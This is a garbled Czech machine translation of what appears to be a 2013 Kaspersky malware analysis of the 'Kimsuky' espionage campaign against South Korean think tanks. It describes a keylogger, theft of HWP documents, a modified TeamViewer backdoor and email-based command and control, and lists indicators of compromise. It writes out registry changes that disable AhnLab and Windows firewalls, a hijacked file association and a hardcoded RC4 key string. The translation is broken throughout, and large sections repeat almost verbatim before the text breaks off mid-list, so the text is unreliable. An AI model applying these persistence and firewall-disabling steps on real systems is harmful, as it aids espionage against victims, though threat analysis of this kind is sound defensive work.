Soubor je pak připojen k e-mailu a poslal na magisterském e-mailový účet. Po přenosu, je okamžitě odstraněn ze systému oběti.

Získání magisterského údajů

Malware také načítá instrukce z poštovního serveru. Kontroluje e-maily v bulharském e-mailový účet s určitou značkou. Identifikovali jsme několik "Předmět značky" v síťové komunikaci: Down_0 , Down_1, Happy_0, Happy_2 a ddd_3 . Po nalezení a e-mail udržuje přílohu, malware stáhne a uloží tuto přílohu s názvem souboru " msdaipp.cnt " v C: \ Program Files \ Common Files \ System \ Ole DB \ . Útočník může poslat další spustitelné soubory tímto způsobem. Spustitelné soubory jsou šifrované RC4 a pak připojen. Klíč pro dešifrování je napevno ve škodlivých vzorků. Je zajímavé, že stejný " rsh! @! # "řetězec je zachována u všech známých vzorků a slouží ke generování klíčů RC4. Jak bylo popsáno výše, malware vypočítá MD5 tohoto řetězce a používá hash jako jeho klíč k dešifrování RC4 spustitelný. Potom je prostý spustitelný klesl na disk jako " sqlsoldb.exe " a spustit, a pak se stěhoval do C: \ Windows složky s názvem souboru "taskmgr.exe" . Původní e-mail a jeho přílohy jsou pak odstraněny z bulharského e-mailové schránky.

Key logger

Další Key Logger modul není příliš složitý - prostě zachycuje úhozy na klávesnici a zapíše zadané klíče do C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc, a také zaznamenává aktivní okno název, kde uživatel stiskl klávesy . Viděli jsme stejný formát v Madi malware . K dispozici je také jedním z klíčových logger varianta, která se přihlásí úhozů do C: \ WINDOWS \ Setup.log .

Výpis adresáře kolektor

Další program, poslal obětem výčet všech jednotek v infikovaném systému a spustí následující příkaz na ně:

dir <písmeno_jednotky>: / / s / t /-c

V praxi se tento příkaz zapsán do C: \ WINDOWS \ msdatt.bat a uskutečňuje výstup přesměrován do C: \ WINDOWS \ msdatl3.inc . V důsledku toho, tento udržuje seznam všech souborů ve všech složkách na disku. Malware později přečte, že údaje a připojí se k obsahu souboru C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc . V tomto bodě, " oledvbs.inc "již ukládá systeminfo výstup.

Je zajímavé, že jeden vzorek z kolektoru výpisu adresáře byl napaden neslavný "Viking" virus čínského původu. Některé z těchto virových úpravy putovali ve volné přírodě na pět let a jeho autoři či provozovatelé nikdy očekávat, že to skončí v tajném APT související špionážní nástroj. Pro útočníky je to určitě velký neúspěch. Nejen, že původní špionáže mít program známky známého škodlivého softwaru, který může být detekován anti-malware produkty, navíc útočníci jsou odhalení jejich skrytých činnost cyber-kriminálními gangy. Nicméně, podle všeho, útočníci si všiml nežádoucí přírůstek do své malware a zbavil infekce. To byl jediný vzorek nesoucí Viking virus.

Kvůli drahé práci malware s různými další soubory, není to na místě ukázat tyto "vztahy" v diagramu:
HWP dokument zloděj

Tento modul zachytí NsP dokumentů na infikovaném počítači. Soubor HWP formát je podobný aplikace Microsoft Word dokumentů, ale podporuje Hangul, jihokorejský aplikace na zpracování textu ze svazku Office Hancom. Hancom společnosti je široce používán v Jižní Koreji. Tento malware modul pracuje nezávisle na ostatních a udržuje své vlastní bulharské e-mailový účet. Účet je napevno v modulu spolu s pánem na e-mail, na který se posílá zachycené dokumenty. Je zajímavé, že modul není vyhledat všechny soubory v NsP infikovaného počítače, ale reaguje pouze na ty, které jsou otevřeny uživatelem a ukradne jim. Toto chování je velmi neobvyklé pro dokument krást součásti a my nevidíme v jiných škodlivých toolkity.

Program kopíruje sám sebe jako <Hangul plné path> \ HncReporter.exe a změny standardního programu sdružení do registru otevřete NsP dokumentů. Provedete to tak, že změní následující hodnoty registru:

HKEY_CLASSES_ROOT \ Hwp.Document.7 \ shell \ open \ command
nebo
HKEY_CLASSES_ROOT \ Hwp.Document.8 \ shell \ open \ command
Ve výchozím nastavení je nastavení registru "<Hangul plný path> \ Hwp.exe" "% 1" sdružující Hangul aplikace " Hwp.exe " s dokumenty NsP Ale škodlivý program, nahradí tento řetězec s následující:.. "<Hangul úplná cesta> \ HncReporter.exe ""% 1 " . Takže, když se uživatel je otevření jakéhokoli dokumentu. NsP je malware program sám popraven otevřít. NsP dokument. Po tomto registru upravit, jakékoli otevření . HWP je dokument číst a poslat jako přílohu e-mailu s předmětem " NsP "na útočníky. Po odeslání malware vykonává skutečnou Hangul aplikaci pro zpracování textu " Hwp.exe " otevřete. NsP dokument jako uživatel zamýšlel. Znamená, že oběť pravděpodobně ani nevšimnete krádež. NsP souboru. Modul je zaslání rutinní závisí na následujících souborů v C: \ Program Files \ Common Files \ System \ Ole DB složky: xmlrwbin.inc, msdaipp.cnt, msdapml.cnt, msdaerr.cnt, msdmeng.cnt a oledjvs.inc .

Dálkové ovládání modulu downloader

Další program je určen výhradně stahovat přílohy z příchozích e-mailů s určitou značkou. Tento program je podobný modul čepu, ale s omezenou funkčností: zachovává hardcoded bulharské e-mailový účet, přihlásí, čte příchozí e-maily a hledá speciálního předmětu tagu " týmu ". Když najde, načte související přílohu, klesne to na pevném disku jako C: \ Program Files \ Common Files \ System \ Ole DB \ taskmgr.exe a spustí. Tento konkrétní spustitelný dorazí bez šifrování.

Dálkové ovládání modulu

Je také zajímavé, že malware autor nebyl zakázku vytvořit backdoor program. Místo toho, autor upravené TeamViewer klientskou verzi 5.0.9104. Počáteční spustitelný tlačil útočníky v e-maily související s dálkovým ovládání modulu se skládá ze tří dalších spustitelných souborů. Dva z nich jsou součástí týmu Viewer sami, a jiný je nějaký backdoor nakladače. Takže, kapátko vytvoří tři soubory v C: \ Windows \ System32 adresáře:

netsvcs.exe - upravený Team Viewer klientem;
netsvcs_ko.dll - zdroje knihovna klienta Team Viewer;
vcmon.exe - installer / startér;
a vytváří služby " Remote Access Service ", upravena k provedení C: \ Windows \ System32 \ vcmon.exe při startu systému. Pokaždé, když vcmon.exe je proveden, zakáže AhnLab firewall od vynulování následující hodnoty registru:

HKLM \ SOFTWARE \ AhnLab \ V3 365 Clinic \ InternetSec
UseFw = 0
UseIps = 0
Pak se upraví nastavení Team Viewer registru. Jak jsme již řekli, komponenty Team Viewer použité v této kampani nejsou ty původní. Jsou mírně upraven. Celkově bylo zjištěno, dvě různé varianty pozměněné verze. Malware autor nahradil všechny položky z " TeamViewer strun "v týmu Viewer komponent. V prvním případě se " Goldstager "řetězec a řetězec" Coinstager "ve druhém. TeamViewer klienta Nastavení registru jsou pak HKLM \ Software \ Goldstager \ Version5 a HKLM \ Software \ Coinstager \ Version5 odpovídajícím způsobem. Launcher nastaví několik hodnoty registru, které řídí, jak nástroj pro vzdálený přístup bude fungovat. Mezi nimi je SecurityPasswordAES . Tento parametr představuje hodnotu hash hesla, s nimiž vzdálený uživatel má připojit ke klientovi Team Viewer. Tímto způsobem, útočníci nastavit předem sdílený ověřovací hodnotu. Za to, že startér provede samotnou Team Viewer klienta netsvcs.exe .

Kdo je Kim?

Je zajímavé, že pokles box mailových účtů iop110112@hotmail.com a rsh1213@hotmail.com jsou registrovány s těmito názvy "Kim": kimsukyang a "Kim asdfa" .

Samozřejmě, že nemůžeme být jisti, že se jedná o skutečné jména útočníků. Nicméně, není tento výběr často vidět. Možná je to také poukazuje na podezřelé severokorejského původu útoku. S ohledem na profily cílových organizací - Jihokorejský vysokých škol, které provádějí výzkumy na mezinárodních záležitostech, produkovat obranné politiky vlády, národní lodní společnosti, podporovat skupiny pro korejské sjednocení - dalo by se jednoduše podezření, že útočníci mohou být ze Severní Koreje .

Cíle téměř dokonale spadají do oblasti jejich zájmu. Na druhou stranu, není to tak těžké zadat libovolný registrační informace a uvést v omyl vyšetřovatelům na zjevnou severokorejského původu. Nestojí nic vymyslet falešné registrační údaje a zadejte kimsukyang při registraci Hotmail. Jsme připustit, že tento registrační údaje neposkytuje konkrétní, nespornou informace o útočníků.

Nicméně útočníků IP-adresy se poskytnout nějaké další stopy. V naší analýze jsme sledovali deset IP adres používaných v Kimsuky operátorů. Všechny z nich leží v rozsahu sítě provincii Jilin provincie Liao-ning a sítě, v Číně.

Žádné další IP-adresy byly odkryté, které by poukazovaly na činnosti útočníků a patří do jiných IP rozsazích. Je zajímavé, že poskytovatelé internetových služeb, které poskytují přístup k internetu v těchto provinciích také věřil k udržení linky do Severní Koreje. Konečně, tato geo-umístění podporuje teorii pravděpodobné, že útočníci stojí za Kimsuky se sídlem v Severní Koreji.

Příloha

Soubory používané malware:

% Windir% \ system32 \ kbdlv2.dll
% Windir% \ system32 \ auto.dll
% Windir% \ system32 \ netsvcs.exe
% Windir% \ system32 \ netsvcs_ko.dll
% Windir% \ system32 \ vcmon.exe
% Windir% \ system32 \ svcsmon.exe
% Windir% \ system32 \ svcsmon_ko.dll
% Windir% \ system32 \ wsmss.exe
% Temp% \ ~ DFE8B437DD7C417A6D.TMP
% Temp% \ ~ DFE8B43.TMP
% Temp% \ ~ tmp.dll
C: \ Windows \ taskmgr.exe
C: \ Windows \ Setup.log
C: \ Windows \ winlog.txt
C: \ Windows \ Update.log
C: \ Windows \ wmdns.log
C: \ Windows \ oledvbs.inc
C: \ Windows \ weoig.log
C: \ Windows \ data.dat
C: \ Windows \ sys.log
C: \ Windows \ PcMon.exe
C: \ Windows \ Update.exe Google
C: \ Windows \ ReadMe.log
C: \ Windows \ msdatt.bat
C: \ Windows \ msdatl3.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msdmeng.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ xmlrwbin.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msdapml.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ sqlsoldb.exe
C: \ Program Files \ Common Files \ System \ Ole DB \ oledjvs.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msdaipp.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ msdaerr.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ sqlxmlx.inc
<Hangul Plný path> \ HncReporter.exe
Související MD5:

3baaf1a873304d2d607dbedf47d3e2b4
3195202066f026de3abfe2f966c9b304
4839370628678f0afe3e6875af010839
173c1528dc6364c44e887a6c9bd3e07c
191d2da5da0e37a3bb3cbca830a405ff
5eef25dc875cfcb441b993f7de8c9805
b20c5db37bda0db8eb1af8fc6e51e703
face9e96058d8fe9750d26dd1dd35876
9f7faf77b1a2918ddf6b1ef344ae199d
d0af6b8bdc4766d1393722d2e67a657b
45448a53ec3db51818f57396be41f34f
80cba157c1cd8ea205007ce7b64e0c2a
f68fa3d8886ef77e623e5d94e7db7e6c
4a1ac739cd2ca21ad656eaade01a3182
4ea3958f941de606a1ffc527eec6963f
637e0c6d18b4238ca3f85bcaec191291
b3caca978b75badffd965a88e08246b0
dbedadc1663abff34ea4bdc3a4e03f70
3ae894917b1d8e4833688571a0573de4
8a85bd84c4d779bf62ff257d1d5ab88b
d94f7a8e6b5d7fc239690a7e65ec1778
f1389f2151dc35f05901aba4e5e473c7
96280f3f9fd8bdbe60a23fa621b85ab6
f25c6f40340fcde742018012ea9451e0
122c523a383034a5baef2362cad53d57
2173bbaea113e0c01722ff8bc2950b28
2a0b18fa0887bb014a344dc336ccdc8c
ffad0446f46d985660ce1337c9d5eaa2
81b484d3c5c347dc94e611bae3a636a3
ab73b1395938c48d62b7eeb5c9f3409d
69930320259ea525844d910a58285e15
Názvy služeb vytvořených malware:

DriverManage
WebService
WebClientManager
Remote Access Service
Zjistíme, jak těmto hrozbám Trojan.Win32.Kimsuky kromě upravených týmu Viewer komponent klienta, které jsou zjištěny při Trojan.Win32.Patched.ps .


"Kimsuky" Operation: Severokorejský APT?

14.9.2013 Zdroj: Kaspersky Hacking | KyberVálka
Po několik měsíců jsme monitorovali probíhající kybernetické špionáže kampaň proti Jižní Koreje think-tanků. Existuje několik důvodů, proč tato kampaň je výjimečný ve svém provedení a logistiky. Všechno to začalo jednoho dne, když jsme se setkali s poněkud naivní špionážní program, který komunikoval jeho "master" prostřednictvím veřejné e-mailového serveru. Tento přístup je spíše vlastní mnoha amatérských virem spisovatelů a tyto útoky škodlivého softwaru jsou většinou ignorovány.

Nicméně, tam bylo pár věcí, které přitahuje naši pozornost:

Veřejnost e-mailového serveru v pochybnost byla Bulharština - mail.bg .
Kompilace řetězec cesty obsažené korejské hieroglyfy.
Tyto dvě skutečnosti nucen se blíže podívat na tento malware - korejské překladače vedle bulharských e-mailové velení a řízení komunikace.

Kompletní nalezena cesta v malware představuje některé korejské řetězce:

D: \ rsh \ 공격 \ UAC_dll (완성) \ Release \ test.pdb

"Rsh" slovo, podle všeho, znamená zkrácení "Remote Shell" a korejská slova mohou být přeloženy do angličtiny jako "útok" a "doplnění", tj.:

D: \ rsh \ ATTACK \ UAC_dll ( DOKONČENÍ ) \ Release \ test.pdb

Ačkoli úplný seznam obětí zůstává neznámý, se nám podařilo identifikovat několik cílů této kampaně. Podle naší technické analýzy, útočníci měli zájem zaměření těchto organizací. "

Sejong Institute

Sejong Institute je nezisková soukromá organizace pro veřejný zájem a vedoucí think tank v Jižní Koreji, provádí výzkum na strategii národní bezpečnosti, sjednocení strategie, regionální otázky a mezinárodní politické ekonomie.

Korea ústav pro obranu analýz (KIDA)

KIDA je komplexní obranný výzkum institucí, která zahrnuje širokou škálu produktů pro obranné účely záležitostí. KIDA je organizována do sedmi výzkumných center: Centrum pro bezpečnost a strategie, Centrum pro vojenské plánování, Centrum pro rozvoj lidských zdrojů, Centrum pro řízení zdrojů, Centrum pro studia zbraňových systémů; Centrum pro studium informační systém a Centrum pro modelování a simulace. KIDA má také IT Consulting Group a různé podpůrné oddělení. Kida posláním je přispět k racionální obranu politiky prostřednictvím intenzivní a systematické výzkumu a analýzy obranných otázkách.

Ministerstvo sjednocení

Ministerstvo sjednocení je výkonným útvarem Jihokorejská vláda odpovědná za činnost směřující k sjednocení Koreje. Jeho hlavní úkoly jsou: stanovení severokorejskou politiku, koordinaci inter-korejské dialog, sledovat inter-korejské spolupráce a vzdělávání veřejnosti o sjednocení.

Hyundai Merchant Marine

Hyundai Merchant Marine je jihokorejská společnost poskytující logistické služby po celém světě Kontejnerová přeprava.

Některé indicie rovněž naznačují, že počítače, které patří do "příznivců korejské sjednocení" ( http://www.unihope.kr/ ) byly také zaměřeny. Mezi organizacemi se počítá, jsou 11 se sídlem v Jižní Koreji a dvě jednotky jsou umístěny v Číně.

Částečně proto, že tato kampaň je velmi omezený a vysoce cílené, jsme se zatím nepodařilo zjistit, jak je to malware rozděluje. Škodlivého vzorky, které jsme našli, jsou v rané fázi malware nejčastěji dodává kopí phishingové e-maily.

Infikování systému

Počáteční Trojan kapátko je Dynamic Link Library fungující jako zavaděč pro další malware. Nezáleží udržovat vývoz a jednoduše přináší další šifrované knihovny zachována ve své části zdrojů. Tato druhá knihovna plní všechny funkce špionáže.

Při spuštění v systému Windows 7, škodlivý knihovna využívá frameworku Metasploit je open-source kód Win7Elevate na vložení škodlivého kódu do explorer.exe . V každém případě, ať už je to Windows 7 nebo ne, tento škodlivý kód dešifruje jeho špionážní knihovnu ze zdrojů, uloží na disk se zdánlivě náhodně, ale hardcoded jména, například ~ DFE8B437DD7C417A6D.TMP , v uživatelském dočasné složky a načte tento obrázek jako knihovna.

Tato další fáze knihovna kopíruje do System32 adresáře ve složce Windows po hardcoded názvu souboru - buď KBDLV2.DLL nebo AUTO.DLL , v závislosti na malware vzorku. Pak služba je vytvořen pro servisní DLL. Servisní jména také se mohou lišit od verze na verzi, jsme zjistili následující jména - DriverManage, webové služby a WebClientManager . Tyto funkce zajišťují malware vytrvalost narušenou OS mezi restartování systému.

V této fázi, malware shromažďuje informace o infikovaném počítači. To zahrnuje výstup systeminfo příkazu uloženého v souboru oledvbs.inc následováním hardcoded cesta: C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc . Tam je další funkce nazvaná - malware vytvoří řetězec obsahující počítač a uživatelská jména, ale to není používán kdekoliv. Podle všeho se jedná o chybu v malware autorem. Později, přijdeme do funkce, takový řetězec by mohl být relevantní, ale malware není schopen najít tato data v místě, kde by měla být. Tyto kroky jsou přijata pouze v případě, že běží v infikovaném systému poprvé. Na startu systému, škodlivý knihovna provádí špionáž činnosti, které potvrzuje, že je načten obecným svchost.exe procesu.
 

Špehování moduly

Existuje mnoho škodlivých programů zapojených do této kampaně, ale kupodivu, každý z nich implementovat jednu špionážní funkce. Kromě základní knihovny ( KBDLV2.DLL / AUTO.DLL ), která je odpovědná za společnou komunikaci s jeho kampaně pána, byli jsme schopni najít modulů, které vykonávají následující funkce:

Klávesové zkratky protokolování
Výpis adresáře kolekce
HWP dokument krádeži
Dálkový ovladač ke stažení a spuštění
Dálkové ovládání přístupu
Vypnutí brány firewall

Na startu systému, základní knihovna zakáže systému firewall a všechny AhnLab firewallu (Jihokorejská bezpečnostní produkt prodejce) od vynulování související hodnoty registru:

= = 0
HKLM \ SOFTWARE \ AhnLab \ V3IS2007 \ InternetSec FWRunMode = 0
HKLM \ SOFTWARE \ AhnLab \ V3IS80 \ je fwmode = 0
 

To také vypne Centrum zabezpečení systému Windows službu, aby se zabránilo upozorní uživatele o zdravotně postižené firewall.

Není náhodou, že malware autor vybral AhnLab bezpečnostní produkt. Během našeho výzkumu Winnti , jsme se dozvěděli, že jeden z korejských obětí byl ostře kritizován v Jižní Koreji regulátorů pomocí zahraničních bezpečnostních produktů. Nevíme jistě, jak tato kritika ovlivnila další jihokorejské organizace, ale víme, že mnoho organizací, jihokorejský nainstalovat AhnLab bezpečnostní produkty. Proto tyto útočníci ani neobtěžujte se vyhnout výrobky zahraničních dodavatelů ', protože jejich cíle jsou pouze jihokorejská.

Jakmile je malware firewall zakáže AhnLab, zkontroluje, zda je soubor taskmgr.exe je umístěn v hardcoded C: \ WINDOWS \ složky. Pokud je soubor přítomen, spustí tento spustitelný soubor. Dále malware smyčky každých 30 minut, aby se zprávy a čekat na odpověď od operátora.

Komunikace

Komunikace mezi robotem a provozovatel protéká bulharské webové bezplatný e-mailový server ( mail.bg ). Bot udržuje napevno přihlašovací údaje pro jeho e-mailový účet. Po ověření, malware posílá e-maily na jinou přesně stanovenou e-mailovou adresu a čte e-maily z e-mailové schránky. Všechny tyto činnosti jsou prováděny pomocí "mail.bg" webové rozhraní s použitím funkcí systému WinInet API. Ze všech vzorků, které se nám podařilo získat, jsme extrahovali následující e-mailové účty použité v této kampani:

beautifl@mail.bg
ennemyman@mail.bg
fasionman@mail.bg
happylove@mail.bg
lovest000@mail.bg
monneyman@mail.bg
sportsman@mail.bg
veryhappy@mail.bg
Zde jsou dva "master" e-mailové adresy, na které roboty posílat e-maily jménem výše uvedených účtů. Jsou zprávy o stavu a předávat infikované systémové informace prostřednictvím příloh:

iop110112@hotmail.com
rsh1213@hotmail.com
Pravidelné podávání zpráv

Chcete-li ohlásit nákazový status, malware čte z C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc který obsahuje systeminfo výstup příkazu. Pokud soubor existuje, je odstraněna po přečtení.

Pak to čte uživatelsky související informace ze souboru sqlxmlx.inc ve stejné složce (vidíme řetězce odkazující na "UserID" komentáře v této části kódu). Ale tento soubor nebyl nikdy vytvořen. Jak si jistě vzpomínáte, tam je funkce, která by měla tyto údaje shromažďovány a měl chytá do tohoto sqlxmlx.inc souboru. Nicméně, na prvním spuštění se shromažďují informace o uživateli uložené do " xmlrwbin.inc " . To v praxi znamená, že malware spisovatel chybně kódované bot pro uložení informací o uživateli do špatného souboru. Tam je šance na mylném kódu i nadále pracovat - údaje o uživateli mohou být zkopírovány do zasílat informace haldy. Ale ne v tomto případě - v době psaní, shromáždil informace o uživateli proměnné, které by měly směřovat k xmlrwbin.inc souboru dosud nebyla inicializována, což je soubor psát k nezdaru. Vidíme, že sqlxmlx.inc není vytvořena k ukládání uživatelských informací.

Dále jsou zachycené kláves číst ze souboru a poslal na master. Klávesové zkratky jsou zaznamenány a uchovávány v obyčejném a konzistentní podobě v tomto souboru - oba názvy oken, které byly zadány a klíče Skutečné pořadí Vstup z klávesnice. Tato data se nachází v souboru C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc vytvořen externí Key Logger modul.

Všechna tato data jsou sloučeny do jednoho souboru xmlrwbin.inc, který je pak šifrován s RC4. Klíčem RC4 je generován jako MD5 hash náhodně generované 117-bajtů vyrovnávací paměti. Aby bylo možné dešifrovat údajů by útočník určitě vědět buď MD5 hash nebo celý obsah bufferu. Tato data je také odeslána, ale RSA šifrovaný. Malware vytvoří 1120 bit veřejný klíč, používá k šifrování 117-bajtů vyrovnávací paměti. Malware pak spojí všechny údaje, které mají být odeslány jako 128 bajtů bloku. Výsledná data se uloží do C: \ Program Files \ Common Files \ System \ Ole DB \ do souboru s názvem podle následujícího formátu:

"<system Time> _ účtu> na bulharské e server>. Txt", například "08191757_beautifl@mail.bg.txt".

Soubor je pak připojen k e-mailu a poslal na magisterském e-mailový účet. Po přenosu, je okamžitě odstraněn ze systému oběti.

Získání magisterského údajů

Malware také načítá instrukce z poštovního serveru. Kontroluje e-maily v bulharském e-mailový účet s určitou značkou. Identifikovali jsme několik "Předmět značky" v síťové komunikaci: Down_0 , Down_1, Happy_0, Happy_2 a ddd_3 . Po nalezení a e-mail udržuje přílohu, malware stáhne a uloží tuto přílohu s názvem souboru " msdaipp.cnt " v C: \ Program Files \ Common Files \ System \ Ole DB \ . Útočník může poslat další spustitelné soubory tímto způsobem. Spustitelné soubory jsou šifrované RC4 a pak připojen. Klíč pro dešifrování je napevno ve škodlivých vzorků. Je zajímavé, že stejný " rsh! @! # "řetězec je zachována u všech známých vzorků a slouží ke generování klíčů RC4. Jak bylo popsáno výše, malware vypočítá MD5 tohoto řetězce a používá hash jako jeho klíč k dešifrování RC4 spustitelný. Potom je prostý spustitelný klesl na disk jako " sqlsoldb.exe " a spustit, a pak se stěhoval do C: \ Windows složky s názvem souboru "taskmgr.exe" . Původní e-mail a jeho přílohy jsou pak odstraněny z bulharského e-mailové schránky.

Key logger

Další Key Logger modul není příliš složitý - prostě zachycuje úhozy na klávesnici a zapíše zadané klíče do C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc, a také zaznamenává aktivní okno název, kde uživatel stiskl klávesy . Viděli jsme stejný formát v Madi malware . K dispozici je také jedním z klíčových logger varianta, která se přihlásí úhozů do C: \ WINDOWS \ Setup.log .

Výpis adresáře kolektor

Další program, poslal obětem výčet všech jednotek v infikovaném systému a spustí následující příkaz na ně:

dir <písmeno_jednotky>: / / s / t /-c

V praxi se tento příkaz zapsán do C: \ WINDOWS \ msdatt.bat a uskutečňuje výstup přesměrován do C: \ WINDOWS \ msdatl3.inc . V důsledku toho, tento udržuje seznam všech souborů ve všech složkách na disku. Malware později přečte, že údaje a připojí se k obsahu souboru C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc . V tomto bodě, " oledvbs.inc "již ukládá systeminfo výstup.

Je zajímavé, že jeden vzorek z kolektoru výpisu adresáře byl napaden neslavný "Viking" virus čínského původu. Některé z těchto virových úpravy putovali ve volné přírodě na pět let a jeho autoři či provozovatelé nikdy očekávat, že to skončí v tajném APT související špionážní nástroj. Pro útočníky je to určitě velký neúspěch. Nejen, že původní špionáže mít program známky známého škodlivého softwaru, který může být detekován anti-malware produkty, navíc útočníci jsou odhalení jejich skrytých činnost cyber-kriminálními gangy. Nicméně, podle všeho, útočníci si všiml nežádoucí přírůstek do své malware a zbavil infekce. To byl jediný vzorek nesoucí Viking virus.

Kvůli drahé práci malware s různými další soubory, není to na místě ukázat tyto "vztahy" v diagramu:
HWP dokument zloděj

Tento modul zachytí NsP dokumentů na infikovaném počítači. Soubor HWP formát je podobný aplikace Microsoft Word dokumentů, ale podporuje Hangul, jihokorejský aplikace na zpracování textu ze svazku Office Hancom. Hancom společnosti je široce používán v Jižní Koreji. Tento malware modul pracuje nezávisle na ostatních a udržuje své vlastní bulharské e-mailový účet. Účet je napevno v modulu spolu s pánem na e-mail, na který se posílá zachycené dokumenty. Je zajímavé, že modul není vyhledat všechny soubory v NsP infikovaného počítače, ale reaguje pouze na ty, které jsou otevřeny uživatelem a ukradne jim. Toto chování je velmi neobvyklé pro dokument krást součásti a my nevidíme v jiných škodlivých toolkity.

Program kopíruje sám sebe jako <Hangul plné path> \ HncReporter.exe a změny standardního programu sdružení do registru otevřete NsP dokumentů. Provedete to tak, že změní následující hodnoty registru:

HKEY_CLASSES_ROOT \ Hwp.Document.7 \ shell \ open \ command
nebo
HKEY_CLASSES_ROOT \ Hwp.Document.8 \ shell \ open \ command
Ve výchozím nastavení je nastavení registru "<Hangul plný path> \ Hwp.exe" "% 1" sdružující Hangul aplikace " Hwp.exe " s dokumenty NsP Ale škodlivý program, nahradí tento řetězec s následující:.. "<Hangul úplná cesta> \ HncReporter.exe ""% 1 " . Takže, když se uživatel je otevření jakéhokoli dokumentu. NsP je malware program sám popraven otevřít. NsP dokument. Po tomto registru upravit, jakékoli otevření . HWP je dokument číst a poslat jako přílohu e-mailu s předmětem " NsP "na útočníky. Po odeslání malware vykonává skutečnou Hangul aplikaci pro zpracování textu " Hwp.exe " otevřete. NsP dokument jako uživatel zamýšlel. Znamená, že oběť pravděpodobně ani nevšimnete krádež. NsP souboru. Modul je zaslání rutinní závisí na následujících souborů v C: \ Program Files \ Common Files \ System \ Ole DB složky: xmlrwbin.inc, msdaipp.cnt, msdapml.cnt, msdaerr.cnt, msdmeng.cnt a oledjvs.inc .

Dálkové ovládání modulu downloader

Další program je určen výhradně stahovat přílohy z příchozích e-mailů s určitou značkou. Tento program je podobný modul čepu, ale s omezenou funkčností: zachovává hardcoded bulharské e-mailový účet, přihlásí, čte příchozí e-maily a hledá speciálního předmětu tagu " týmu ". Když najde, načte související přílohu, klesne to na pevném disku jako C: \ Program Files \ Common Files \ System \ Ole DB \ taskmgr.exe a spustí. Tento konkrétní spustitelný dorazí bez šifrování.

Dálkové ovládání modulu

Je také zajímavé, že malware autor nebyl zakázku vytvořit backdoor program. Místo toho, autor upravené TeamViewer klientskou verzi 5.0.9104. Počáteční spustitelný tlačil útočníky v e-maily související s dálkovým ovládání modulu se skládá ze tří dalších spustitelných souborů. Dva z nich jsou součástí týmu Viewer sami, a jiný je nějaký backdoor nakladače. Takže, kapátko vytvoří tři soubory v C: \ Windows \ System32 adresáře:

netsvcs.exe - upravený Team Viewer klientem;
netsvcs_ko.dll - zdroje knihovna klienta Team Viewer;
vcmon.exe - installer / startér;
a vytváří služby " Remote Access Service ", upravena k provedení C: \ Windows \ System32 \ vcmon.exe při startu systému. Pokaždé, když vcmon.exe je proveden, zakáže AhnLab firewall od vynulování následující hodnoty registru:

HKLM \ SOFTWARE \ AhnLab \ V3 365 Clinic \ InternetSec
UseFw = 0
UseIps = 0
Pak se upraví nastavení Team Viewer registru. Jak jsme již řekli, komponenty Team Viewer použité v této kampani nejsou ty původní. Jsou mírně upraven. Celkově bylo zjištěno, dvě různé varianty pozměněné verze. Malware autor nahradil všechny položky z " TeamViewer strun "v týmu Viewer komponent. V prvním případě se " Goldstager "řetězec a řetězec" Coinstager "ve druhém. TeamViewer klienta Nastavení registru jsou pak HKLM \ Software \ Goldstager \ Version5 a HKLM \ Software \ Coinstager \ Version5 odpovídajícím způsobem. Launcher nastaví několik hodnoty registru, které řídí, jak nástroj pro vzdálený přístup bude fungovat. Mezi nimi je SecurityPasswordAES . Tento parametr představuje hodnotu hash hesla, s nimiž vzdálený uživatel má připojit ke klientovi Team Viewer. Tímto způsobem, útočníci nastavit předem sdílený ověřovací hodnotu. Za to, že startér provede samotnou Team Viewer klienta netsvcs.exe .

Kdo je Kim?

Je zajímavé, že pokles box mailových účtů iop110112@hotmail.com a rsh1213@hotmail.com jsou registrovány s těmito názvy "Kim": kimsukyang a "Kim asdfa" .

Samozřejmě, že nemůžeme být jisti, že se jedná o skutečné jména útočníků. Nicméně, není tento výběr často vidět. Možná je to také poukazuje na podezřelé severokorejského původu útoku. S ohledem na profily cílových organizací - Jihokorejský vysokých škol, které provádějí výzkumy na mezinárodních záležitostech, produkovat obranné politiky vlády, národní lodní společnosti, podporovat skupiny pro korejské sjednocení - dalo by se jednoduše podezření, že útočníci mohou být ze Severní Koreje .

Cíle téměř dokonale spadají do oblasti jejich zájmu. Na druhou stranu, není to tak těžké zadat libovolný registrační informace a uvést v omyl vyšetřovatelům na zjevnou severokorejského původu. Nestojí nic vymyslet falešné registrační údaje a zadejte kimsukyang při registraci Hotmail. Jsme připustit, že tento registrační údaje neposkytuje konkrétní, nespornou informace o útočníků.

Nicméně útočníků IP-adresy se poskytnout nějaké další stopy. V naší analýze jsme sledovali deset IP adres používaných v Kimsuky operátorů. Všechny z nich leží v rozsahu sítě provincii Jilin provincie Liao-ning a sítě, v Číně.

Žádné další IP-adresy byly odkryté, které by poukazovaly na činnosti útočníků a patří do jiných IP rozsazích. Je zajímavé, že poskytovatelé internetových služeb, které poskytují přístup k internetu v těchto provinciích také věřil k udržení linky do Severní Koreje. Konečně, tato geo-umístění podporuje teorii pravděpodobné, že útočníci stojí za Kimsuky se sídlem v Severní Koreji.

Příloha

Soubory používané malware:

% Windir% \ system32 \ kbdlv2.dll
% Windir% \ system32 \ auto.dll
% Windir% \ system32 \ netsvcs.exe
% Windir% \ system32 \ netsvcs_ko.dll
% Windir% \ system32 \ vcmon.exe
% Windir% \ system32 \ svcsmon.exe
% Windir% \ system32 \ svcsmon_ko.dll
% Windir% \ system32 \ wsmss.exe
% Temp% \ ~ DFE8B437DD7C417A6D.TMP
% Temp% \ ~ DFE8B43.TMP
% Temp% \ ~ tmp.dll
C: \ Windows \ taskmgr.exe
C: \ Windows \ Setup.log
C: \ Windows \ winlog.txt
C: \ Windows \ Update.log
C: \ Windows \ wmdns.log
C: \ Windows \ oledvbs.inc
